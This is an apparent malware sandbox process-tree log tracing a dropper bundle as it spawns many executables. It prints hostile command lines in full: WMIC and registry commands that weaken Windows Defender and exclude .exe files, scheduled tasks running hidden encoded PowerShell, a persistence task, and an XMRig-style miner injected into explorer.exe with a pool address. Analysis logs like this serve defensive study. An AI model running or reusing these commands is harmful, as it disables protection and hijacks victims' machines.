C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:4060
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:7068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:1864
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:7112
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:5124
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4976
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:5912
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:6168
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵PID:6900
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵PID:5352
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵PID:2260
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵PID:3268
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵PID:7068
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵PID:1616
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵PID:4756
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵PID:5792
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJErZqgVH" /SC once /ST 01:56:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
PID:5040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 22:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\eoQqaYj.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:2016
-
-
-
-
-
C:\Users\Admin\Documents\CSo2z9xN6eUJZJczsF_aGmfG.exe"C:\Users\Admin\Documents\CSo2z9xN6eUJZJczsF_aGmfG.exe" /mixtwo8⤵PID:3480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 2609⤵
- Program crash
PID:6352
-
-
-
C:\Users\Admin\Documents\X2JPZVt8MZ50nVqCj6ohQZWU.exe"C:\Users\Admin\Documents\X2JPZVt8MZ50nVqCj6ohQZWU.exe"8⤵PID:2392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 2649⤵
- Program crash
PID:5668
-
-
-
-
-
C:\Users\Admin\Documents\QMUSyMnggNyMZh2xgRUSjOuk.exe"C:\Users\Admin\Documents\QMUSyMnggNyMZh2xgRUSjOuk.exe"6⤵PID:1996
-
C:\Users\Admin\AppData\Roaming\7766727.scr"C:\Users\Admin\AppData\Roaming\7766727.scr" /S7⤵PID:1160
-
-
C:\Users\Admin\AppData\Roaming\7559600.scr"C:\Users\Admin\AppData\Roaming\7559600.scr" /S7⤵PID:6132
-
-
C:\Users\Admin\AppData\Roaming\3087375.scr"C:\Users\Admin\AppData\Roaming\3087375.scr" /S7⤵PID:5412
-
-
-
C:\Users\Admin\Documents\fwkM0JiHyaMf2fKRqbNz0zAO.exe"C:\Users\Admin\Documents\fwkM0JiHyaMf2fKRqbNz0zAO.exe"6⤵PID:1104
-
-
C:\Users\Admin\Documents\MpBzpMmhzPyK7XuWeDHDygwv.exe"C:\Users\Admin\Documents\MpBzpMmhzPyK7XuWeDHDygwv.exe"6⤵PID:1108
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:3300
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:5848
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵PID:3956
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 21006⤵
- Program crash
PID:416
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵PID:3444
-
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
PID:716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 2646⤵
- Program crash
PID:5316
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:472 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:5824
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:4724
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:5188
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:5500
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:4168
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:4352
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:4992
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:6892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:1488
-
C:\ProgramData\7890873.exe"C:\ProgramData\7890873.exe"8⤵PID:1788
-
-
C:\ProgramData\5904568.exe"C:\ProgramData\5904568.exe"8⤵PID:5204
-
C:\ProgramData\5904568.exe"C:\ProgramData\5904568.exe"9⤵PID:2264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 10769⤵
- Program crash
PID:6016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 10769⤵
- Program crash
PID:1704
-
-
-
C:\ProgramData\3167059.exe"C:\ProgramData\3167059.exe"8⤵PID:3488
-
-
C:\ProgramData\481438.exe"C:\ProgramData\481438.exe"8⤵PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:2928
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2928 -s 17408⤵
- Program crash
PID:4748
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2928 -s 17408⤵
- Program crash
PID:5444
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 1928⤵
- Program crash
PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:2648
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:3880
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3880 -s 17248⤵
- Program crash
PID:2160
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3880 -s 17248⤵
- Program crash
PID:5432
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:1900
-
C:\Users\Admin\AppData\Local\Temp\tmp8C82_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp8C82_tmp.exe"8⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\tmp8C82_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp8C82_tmp.exe9⤵PID:3224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\is-S69HE.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-S69HE.tmp\setup_2.tmp" /SL5="$202DC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\is-HKO9D.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-HKO9D.tmp\setup_2.tmp" /SL5="$4031A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:2976
-
C:\Users\Admin\AppData\Local\Temp\is-71F7R.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-71F7R.tmp\postback.exe" ss111⤵PID:1996
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:4160
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:6112
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:5384
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
PID:784 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 2686⤵
- Program crash
PID:5424
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
PID:916 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 2606⤵
- Program crash
PID:5232
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:836
-
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\is-S9DK9.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-S9DK9.tmp\Sun1966fb31dd5a07.tmp" /SL5="$30080,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\is-JF4QE.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-JF4QE.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
PID:4124 -
C:\Program Files\Windows Media Player\SNWAJOLHGW\ultramediaburner.exe"C:\Program Files\Windows Media Player\SNWAJOLHGW\ultramediaburner.exe" /VERYSILENT8⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\is-7BPUO.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-7BPUO.tmp\ultramediaburner.tmp" /SL5="$7032C,281924,62464,C:\Program Files\Windows Media Player\SNWAJOLHGW\ultramediaburner.exe" /VERYSILENT9⤵PID:6584
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:2140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\17-cb4cd-a32-c3299-a3bdfa90c9ee2\Laejakaeshyzhe.exe"C:\Users\Admin\AppData\Local\Temp\17-cb4cd-a32-c3299-a3bdfa90c9ee2\Laejakaeshyzhe.exe"8⤵PID:4784
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:4452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd3b6346f8,0x7ffd3b634708,0x7ffd3b63471810⤵PID:6448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:210⤵PID:6532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:310⤵PID:1188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:810⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:110⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:110⤵PID:2608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:110⤵PID:7028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:110⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:110⤵PID:7140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3804 /prefetch:810⤵PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,14146013222131715990,233926477510012918,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3804 /prefetch:810⤵PID:2268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\11-bdd63-834-e649c-cd357ce2b47be\SHebygubace.exe"C:\Users\Admin\AppData\Local\Temp\11-bdd63-834-e649c-cd357ce2b47be\SHebygubace.exe"8⤵PID:3256
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nuayqunj.n1k\GcleanerEU.exe /eufive & exit9⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\nuayqunj.n1k\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nuayqunj.n1k\GcleanerEU.exe /eufive10⤵PID:6396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 25611⤵
- Program crash
PID:6336
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z2jhqqh3.tos\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:5972
-
C:\Users\Admin\AppData\Local\Temp\z2jhqqh3.tos\installer.exeC:\Users\Admin\AppData\Local\Temp\z2jhqqh3.tos\installer.exe /qn CAMPAIGN="654"10⤵PID:6848
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\z2jhqqh3.tos\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\z2jhqqh3.tos\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632113504 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:6732
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwqvsylh.ob2\anyname.exe & exit9⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\kwqvsylh.ob2\anyname.exeC:\Users\Admin\AppData\Local\Temp\kwqvsylh.ob2\anyname.exe10⤵PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\msrex0e4.fas\gcleaner.exe /mixfive & exit9⤵PID:3488
-
C:\Users\Admin\AppData\Local\Temp\msrex0e4.fas\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\msrex0e4.fas\gcleaner.exe /mixfive10⤵PID:3200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 26011⤵
- Program crash
PID:1448
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\tmpBB4C_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpBB4C_tmp.exe"6⤵PID:5860
-
C:\Users\Admin\AppData\Local\Temp\tmpBB4C_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpBB4C_tmp.exe7⤵PID:5596
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Users\Admin\AppData\Local\Temp\7zS4F0B5251\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:476 -
C:\Users\Admin\AppData\Roaming\3777470.scr"C:\Users\Admin\AppData\Roaming\3777470.scr" /S6⤵
- Executes dropped EXE
PID:4268
-
-
C:\Users\Admin\AppData\Roaming\8308234.scr"C:\Users\Admin\AppData\Roaming\8308234.scr" /S6⤵PID:5764
-
-
C:\Users\Admin\AppData\Roaming\5499578.scr"C:\Users\Admin\AppData\Roaming\5499578.scr" /S6⤵PID:5884
-
C:\Users\Admin\AppData\Roaming\5499578.scr"C:\Users\Admin\AppData\Roaming\5499578.scr"7⤵PID:5356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 10847⤵
- Program crash
PID:5172
-
-
